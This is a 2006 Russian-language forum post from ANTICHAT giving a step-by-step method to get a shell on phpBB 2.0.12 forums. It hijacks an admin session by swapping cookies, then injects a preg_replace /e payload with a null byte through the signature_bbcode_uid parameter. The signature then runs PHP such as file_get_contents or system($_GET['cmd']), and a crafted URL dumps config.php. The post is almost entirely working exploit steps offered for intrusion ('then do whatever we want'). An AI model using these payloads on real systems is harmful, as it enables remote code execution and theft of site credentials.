ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу Способы заливки шелла в phpBB 2.0.12
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #17  
Старый 11.06.2006, 12:55
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию
Войдя под админом, при помощи заменой cookies идем в профиль.
Пришли? Дальше открываем исходный текст страницы и находим:
<form action="profile.php" method="post">
дописываем после profile.php такие строки ?signature_bbcode_uid=(.*)/e%00
ИТого должно получится
<form action="profile.php?signature_bbcode_uid=(.*)/e%00" method="post">

Обновляем страницу.......

И в подписе прописываем
[b:file_get_contents($_GET[bb])
В это место можно, естественно, вставить любой php-код, в том числе и system($_GET['cmd']).

Тыкаем СОхранить или ОТправить.
Идем по ссылке
http://www.someserver.ru/forum/profi...&bb=config.php

Смотри в подпись и БИНГО..... Содержимое config.php .
ДАльше делаем что хотим. (с) журнал ХАКЕР

Спасибо особенное Dr.Check'у.
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ